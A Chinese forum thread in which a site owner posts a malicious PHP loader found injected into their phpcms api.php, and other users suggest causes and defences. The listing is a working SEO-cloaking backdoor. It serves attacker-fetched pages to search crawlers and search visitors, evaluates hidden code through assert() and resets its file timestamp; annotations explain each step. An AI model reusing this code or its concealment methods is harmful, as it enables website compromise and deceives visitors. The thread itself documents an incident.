最近网站两次被人挂广告,代码写得我极其无语

oxsicn 发布于 2013/06/17 15:54

拷贝下来的代码:

<?php
    // NOTE(review): this listing is an injected SEO-spam / cloaking loader, reproduced verbatim for analysis.
    // This line: hides PHP error output, removes the execution time limit, then defines
    //   SID   = '26436'  (marker string the script looks for inside the "id" query parameter),
    //   ROOT  = directory of the infected file,
    //   LOCAL = True     (enables the on-disk page cache used later in the script).
    // heade_() returns true when $_GET['id'] contains SID (case-insensitive stristr), i.e. the
    // request URL carries this installation's marker; $_GET['id'] is read without isset().
    // Detection hint: a web-facing script that suddenly starts with display_errors=Off and
    // max_execution_time=0 followed by define('SID', ...) is worth diffing against a known-good copy.
    ini_set('display_errors','Off');ini_set('max_execution_time', 0);define('SID', '26436');define('ROOT', dirname(__FILE__));define('LOCAL', True);function heade_(){if (stristr($_GET['id'], SID)) return true; else return false;}
    // This single line holds three functions and two top-level setup steps, in this order:
    //
    // isspider($open = 0): when $open is falsy and heade_() is true, returns true immediately.
    //   Otherwise lower-cases the User-Agent (prefixed with "agent:" so that strpos() > 0 also
    //   matches at the start) and returns true if it contains googlebot, baiduspider, sogou,
    //   yahoo or soso; false otherwise.
    //
    // isindex(): returns false when heade_() is true. Otherwise returns true when SCRIPT_NAME
    //   contains "/index.", "/default." or "/main." and the query string is empty. Any other
    //   case falls off the end of the function (implicit null, which the caller negates to true).
    //
    // Happy(): picks a client IP from REMOTE_ADDR, overridden by HTTP_CLIENT_IP or by the first
    //   X-Forwarded-For address not starting with 10., 172.16. or 192.168. Both headers are
    //   client-supplied. Returns False when the IP contains any prefix in $TNT_Group (substring
    //   match via stristr), True otherwise.
    //   NOTE(review): the $TNT_Group prefixes are presumably search-engine crawler ranges - confirm.
    //
    // if (LOCAL): creates ROOT/HtmlSave when it does not exist. An unexpected "HtmlSave"
    //   directory next to the infected script is a filesystem indicator of this sample.
    //
    // if (SID == '_NOT_OPTION_X5'): self-modification. The placeholder is split into fragments so
    //   the full string never appears literally. The script reads its own source, replaces the
    //   placeholder with mt_rand(20000, 99999), writes the file back and restores the original
    //   mtime with touch(). Here SID is already '26436', so this branch is not taken as shown.
    //   Because the mtime is restored, integrity checks should compare hashes, not timestamps.
    function isspider($open = 0){if (!$open) if (heade_()) return true;$agent="agent:".strtolower($_SERVER["HTTP_USER_AGENT"]);$searray=array("googlebot","baiduspider","sogou","yahoo","soso");foreach($searray as $se){ if (strpos($agent,$se)>0) return true;}return false;}function isindex(){if (heade_()) return false;$pname=strtolower($_SERVER["SCRIPT_NAME"]);$pquery=strtolower($_SERVER["QUERY_STRING"]);$parray=array("/index.","/default.","/main.");foreach($parray as $se){ if (strpos($pname,$se)>-1&&strlen($pquery)<1) return true;}}function Happy(){$ip = $_SERVER['REMOTE_ADDR'];if (isset($_SERVER['HTTP_CLIENT_IP']) && preg_match('/^([0-9]{1,3}\.){3}[0-9]{1,3}$/', $_SERVER['HTTP_CLIENT_IP'])) {$ip = $_SERVER['HTTP_CLIENT_IP'];} elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']) AND preg_match_all('#\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}#s', $_SERVER['HTTP_X_FORWARDED_FOR'], $matches)) {foreach ($matches[0] AS $xip) {if (!preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {$ip = $xip;break;}}}$TNT_Group = array('123.125.68', '220.181.68', '220.181.7', '121.14.89','203.208.60', '210.72.225', '125.90.88', '220.181.108','123.125.71','123.125.67');foreach($TNT_Group as $addr) if (stristr($ip, $addr)) return False;return True;}if (LOCAL){$HtmlDir = ROOT.'/'.'HtmlSave';if (!is_dir($HtmlDir)) mkdir($HtmlDir);}if (SID == '_N'.'OT_O'.'PTI'.'ON_X5'){if (function_exists('file_get_contents')){$ftime = filemtime(__FILE__);$N_ID = mt_rand(20000, 99999);$c_f = file_get_contents(__FILE__);$c_f = str_replace('_NOT_'.'OPTION_X5', $N_ID, $c_f);fwrite(fopen(__FILE__, 'w'), $c_f);touch(__FILE__, $ftime);}}
    // Request "action=ad": fetch a remote page over HTTP and print it, then stop. The URL is built
    // from string fragments so it never appears literally; concatenated and defanged it reads
    // hxxp://img[.]klgw01[.]com/p.html. The @ operator hides fetch errors.
    if ($_GET['action'] == 'ad') die(@file_get_contents('htt'.'p:/'.'/i'.'mg.klg'.'w01.'.'com'.'/p'.'.ht'.'ml'));
    // Visitor branch: runs only when Happy() is true (client IP not in the hard-coded prefix list).
    // The Referer is lower-cased and prefixed with "refer:". When the User-Agent is not a listed
    // crawler (isspider(1) skips the heade_() shortcut), the Referer names one of google, baidu,
    // sogou, yahoo, soso or 360, and the request carries the SID marker, the script prints the
    // body of hxxp://img[.]klgw01[.]com/c.txt (defanged) and exits.
    // Effect: people arriving from search results get remote-controlled content instead of the
    // site's own page. Outbound HTTP from the web server to this host is a network indicator.
    if (Happy())
    {$urlrefer=strtolower("refer:".@$_SERVER["HTTP_REFERER"]);$searray=array("google","baidu","sogou","yahoo","soso","360");if (!isspider(1))foreach($searray as $se){if (strpos($urlrefer,$se)>0){if (heade_()){echo @file_get_contents('ht'.'t'.'p://i'.'m'.'g.k'.'l'.'g'.'w'.'0'.'1.c'.'o'.'m/c'.'.t'.'xt');exit;}}}}

    // Crawler branch. Taken when isspider() is true (crawler User-Agent, or a request carrying the
    // SID marker) and isindex() is not true. The bare home page is therefore left alone, which
    // keeps the infection less visible to the site owner. Note the bitwise & on two booleans.
    if (isspider() & !isindex())
    // Resolve $SID, derive $ID from the "id" parameter with the SID marker stripped, and if a
    // cached copy HtmlSave/<ID with dots removed> exists, serve it as text/html and stop.
    {if (isset($N_ID)) $SID = $N_ID;if (SID != '_N'.'OT_O'.'PTI'.'ON_X5') $SID = SID;$ID = trim(str_replace(SID, '', $_GET['id']));$NMNEWONSOJFOJNS = '';if (LOCAL){if (is_file($HtmlDir.'/'.str_replace('.', '', $ID))){ header('Content-Type: text/html; charset=UTF-8');die(file_get_contents($HtmlDir.'/'.str_replace('.', '', $ID)));}}
    // Build the query string sent to the remote server: the victim's Host header ("domain=") and
    // the SID, plus a random "words" value and the requested $ID when an id parameter is present.
    $FF0ffff__ff_ff_ff1110 = 'domain='.$_SERVER['HTTP_HOST']; $FF0ffff__ff_ff_ff1110 .= $NMNEWONSOJFOJNS = '&SID='.$SID;
    if (isset($_GET['id'])) $_q = '?words='.mt_rand(1, 10).'&v='.$ID.'&'.$FF0ffff__ff_ff_ff1110; else $_q = '?'.$FF0ffff__ff_ff_ff1110;
    // Nested base64: 'PT0=' decodes to '==', so the outer call decodes 'anVzdA==' to "just".
    // The value is only used as a filler entry in the str_replace() search arrays below.
    $_0101010101 = $_000000003F = BAsE64_DECODE('a'.'n'.'V'.'z'.'d'.'A'.BASE64_DECODE('P'.'T0'.'=')); $_FFFF11 = $_fFf1f = '';
    // Helper: replaces every '7' with '3' in its first argument (defaults of $_II and $_I1).
    function _00F0f00of00o0F0o0f0Fo($_FFFFFF, $_I1 = '3', $_II = '7') {return str_replace($_II,$_I1,$_FFFFFF);}
    // Each str_replace() below strips characters from a decoy English sentence until a single
    // letter is left. $_000000 is never assigned, so it acts as an empty replacement.
    // $_GET[id] and $_GET[s] use unquoted keys (bare constants): tolerated with a notice on old PHP,
    // a thrown Error on PHP 8.
    $__0xFFFF00FFF0F = str_replace(array('r','d','l','e','y','v','z','s','s','2',' ',$_0101010101,$_000000003F,'0','.','g'), $_000000, 'say very g00d.');
    $__0xFFF101= str_replace(array('E','r','s','Z','i','J','z','s','v','S',' ',$_0101010101,$_GET[id],$_000000003F,',','.','e'), '', ' Js Ss Ev Zs it SS.');
    $__0111111FFF = str_replace(array('u','i','d','o','y','n','e','W','a','2',' ',$_GET[s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you is.');
    // Base64 blob holding the reversed fetch URL. It contains neither '3' nor '7', so this
    // str_replace() and the helper call further down leave it unchanged (pure noise).
    $ffofo_of00offff = str_replace('3', '7', 'cGhwLjV4LzV4L21vYy42NjZpYXRnbm9kLmQvLzpwdHRo'.''.'='.''.'=');
    $__0xFFF010101= str_replace(array('a','r','s','Z','y','J','z','s','v','S',' ',$_0101010101,$_GET[id],$_000000003F,',','.'), '', ' Js s Jv Zs are SS.');
    $__0x111F01101100 = str_replace(array('W','e','t','o','y','m','e','h','o','u',' ','i',$_0101010101,$_000000003F,',','.','#'), $_000000, ' We the mis you.');
    $__01111111FFF = str_replace(array('u','i','d','o','y','n','z','W','a','e',' ',$_GET[s],$_0101010101,$_000000003F,',','.','#'), '', ' We and you are.');
    $ffoff0o_of00000offff = _00F0f00of00o0F0o0f0Fo($ffofo_of00offff);
    // Assembles a string of PHP source: $_conn = file_get_contents("<url><query>").
    // <url> = urldecode(strrev(base64_decode(blob))), which works out to
    // hxxp://d.dongtai666[.]com/x5/x5.php (defanged). The function name is split into fragments
    // and chr() calls so "file_get_contents" does not appear as one token in this statement.
    $_o0o001100o111o011 ='$_conn = f'.'il'.'e_g'.'et_'.chr(99).'o'.chr(110).'ten'.'ts("'.urldecode(strrev(bAse64_decode($ffoff0o_of00000offff.'='.''.'='))).$_q.'")';
    // The six single letters concatenate to "tressa"; strrev() yields the function name "assert".
    $_E=strrev($__0xFFF101.''.''.$__01111111FFF.$__0xFFF010101.$__0111111FFF.''.''.$__0x111F01101100.''.''.$__0xFFFF00FFF0F);
    // Variable-function call: assert($string). On PHP 5 and 7 assert() evaluates a string argument
    // as code, so this is eval() without the literal keyword and it defines $_conn. String
    // evaluation by assert() was deprecated in PHP 7.2 and removed in PHP 8.0.
    // Scanners should flag variable-function calls of the form $name($string), not just "eval(".
    ($_=$_E).$_($_o0o001100o111o011);$_jHHsHHs = $H0F0o00po = $_conn;
    // Responses shorter than 500 bytes are discarded. Otherwise the body is written once to
    // HtmlSave/<ID with dots removed> and echoed as text/html, so crawlers index attacker-supplied
    // pages under the victim's domain. Setting allow_url_fopen=Off blocks this remote fetch where
    // the site does not need URL wrappers.
    // The trailing "#..." token is a comment and never executes; it looks like base64 and is a
    // stable string for signature matching.
    if (500 > strlen($_jHHsHHs)) Exit;if (LOCAL) if (!file_exists($HtmlDir.'/'.str_replace('.', '', $ID))) fwrite(fopen($HtmlDir.'/'.str_replace('.', '', $ID), 'w'), $_jHHsHHs);header('Content-Type: text/html; charset=UTF-8');echo $_jHHsHHs;exit;#w7vT0MLywvQgvs3Du9PQybG6pg
    }
?>


我最无语的是他把代码写在我的api.php文件里,导致我的验证码等功能都失效了

我用的phpcms已更新到最新,空间是新网的,ftp密码是新网随机生成的,不知道黑客是通过什么手段修改的?

浏览者
你不能保证你同一台机器的其他应用没有漏洞
阿伏流
一看到新网,,,大概就明白了,阿里云吧。
天闲
挂马怨新网?一般用一些网上下载的“cms”这样的网站确实经常被挂马。我自己写的代码再烂也没见挂马的....
阿伏流
回复 @no_way : 是阿里云收购的万网,主机分为阿里云的自主技术的阿里云主机和万网传统的万网云主机。
no_way
阿里云不是万网?
leo108
也不能保证phpcms没有未公布的漏洞
苏生不惑
代码没加密吗
Liberxue
貌似 很久以前我看见漏洞了..........好久没关注phpv9貌似有漏洞 不知道打补丁没
ywq111
除了phpcms之外,你确定不是phpmyadmin或者别的软件的问题?或者和你同机器的别的网站漏洞导致的旁注,建议你查找下和自己相同ip下的网站,看看是否那些网站也存在相同问题,如果问题相同,那你懂的。。。
herro
请问你是哪里的空间?我的也是这样的。。一样的代码
oxsicn
新网空间
大鹏rocing
排查日志,不排除v9存在未公开漏洞的可能性
子弹兄
我为被这样挂过,安装个安全狗吧,还有防火墙,再者文件权限设置
carl_涛
大部分被挂马都是文件权限问题导致的,公司的discuz被挂了N多次,可以说是无孔不入~~